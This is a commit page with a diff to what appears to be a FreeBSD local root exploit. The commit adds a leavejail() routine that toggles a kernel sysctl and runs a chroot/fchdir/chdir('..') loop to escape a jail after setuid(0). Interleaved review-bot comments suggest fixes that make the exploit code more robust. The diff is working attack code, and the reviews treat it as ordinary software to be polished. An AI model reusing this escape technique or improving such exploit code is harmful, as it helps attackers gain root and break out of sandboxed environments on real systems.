authorJason A. Donenfeld <Jason@zx2c4.com>2011-02-27 01:21:43 -0500
committerJason A. Donenfeld <Jason@zx2c4.com>2011-02-27 01:21:43 -0500
commite90174bd63a6cbb3403e222e9bb72ea6949e332c (patch)
treef00dbc439e0dc9eed05eab7f67eeae4307495a65
parentClean up headers. Make l33t. (diff)
Non-functional jail escape functionality.
-rw-r--r--current-thread-exec.c64
1 files changed, 64 insertions, 0 deletions
diff --git a/current-thread-exec.c b/current-thread-exec.c
index 1bf6dbd..cd6bd1d 100644
--- a/current-thread-exec.c
+++ b/current-thread-exec.c
@@ -6,12 +6,73 @@
#include <sys/ucred.h>
#include <sys/mman.h>
#include <sys/socket.h>
+#include <sys/stat.h>
#include <netgraph/ng_socket.h>
#include <stdio.h>
+#include <fcntl.h>
#include <unistd.h>
#define PAGES 1
+int leavejail(void)
+{
+ int fail = 0;
+ int val = 2;
+ struct stat dirinfo;
+ ino_t chroot_root;
+ if (stat("/", &dirinfo) < 0) {
+ perror("\t[-] couldn't stat /");
+ goto die;
+ }
+ chroot_root = dirinfo.st_ino;
+ if (sysctlbyname("kern.chroot_allow_open_directories", NULL, 0, &val, sizeof(val)) < 0) {
+ perror("\t[-] couldn't change sysctl");
+ goto die;
+ }
+ mkdir("temp_dir", 0755);
+ int fd = open(".", O_RDONLY);
+ if (fd < 0) {
+ perror("\t[-] couldn't open this directory");
+ goto die;
+ }
+ if (chroot("temp_dir") < 0) {
+ perror("\t[-] couldn't chroot to temp_dir");
+ goto die;
+ }
+ if (fchdir(fd) < 0) {
+ perror("\t[-] couldn't change to fd");
+ goto die;
+ }
+ close(fd);
+ int i;
+ for (i = 0; i < 1024; ++i) {
+ if (chdir("..") < 0) {
+ perror("\t[-] couldn't chdir backwards");
+ goto die;
+ }
+ }
+ if (chroot(".") < 0) {
+ perror("\t[-] couldn't obtain final chroot");
+ goto die;
+ }
+ if (stat("/", &dirinfo) < 0) {
+ perror("\t[-] couldn't stat new /");
+ goto die;
+ }
+ if (dirinfo.st_ino == chroot_root) {
+ fprintf(stderr, "\t[-] new root is the same as old root\n");
+ goto die;
+ }
+end:
+ val = 0;
+ sysctlbyname("kern.chroot_allow_open_directories", NULL, 0, &val, sizeof(val));
+ return fail;
+die:
+ close(fd);
+ fail = 1;
+ goto end;
+}
+
volatile int got_root = 0;
int root(void)
{
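Review bot: The `die:` label closes `fd` on every failure path, but `fd` is only assigned at the `open(".", O_RDONLY)` line, so the two earlier `goto die` jumps (after the failed `stat("/")` and the failed `sysctlbyname`) pass an indeterminate value to `close()`, and the four jumps taken after the `close(fd)` that precedes the chdir loop close the same descriptor a second time. Declare it with the other locals as `int fd = -1;`, make the open a plain assignment `fd = open(".", O_RDONLY);`, reset it after the successful close with `fd = -1;`, and guard the label with `if (fd >= 0) close(fd);`. The result of `mkdir("temp_dir", 0755)` is also discarded; an EEXIST there is harmless, but any other failure is only reported indirectly by the later `chroot` perror, so a short comment such as `/* EEXIST is fine; any other error surfaces at chroot() below */` would make that intent explicit. leavejail() lies entirely within this hunk.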
@@ -81,6 +142,9 @@ int main(int argc, char *argv[])
fprintf(stderr, "[+] elevating permissions\n");
setuid(0);
setgid(0);
+ fprintf(stderr, "[+] attempting to leave jail...\n");
+ if (leavejail())
+ fprintf(stderr, "[-] failed to leave jail\n");
if (getuid() != 0) {
fprintf(stderr, "[-] failed to get root\n");
return -1;
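Review bot: The new `if (leavejail())` following the `[+] attempting to leave jail...` message omits braces, while the `if (getuid() != 0)` check immediately below it in the same function uses them; writing it as `if (leavejail()) {` / `fprintf(stderr, "[-] failed to leave jail\n");` / `}` keeps the file consistent and avoids the single-statement-body pitfall. A one-line comment that the failure is deliberately non-fatal would also help, e.g. `/* best-effort: leavejail() reports its own errors; continue regardless */`, since the getuid() check that follows does return on failure. main() starts and ends outside the hunk.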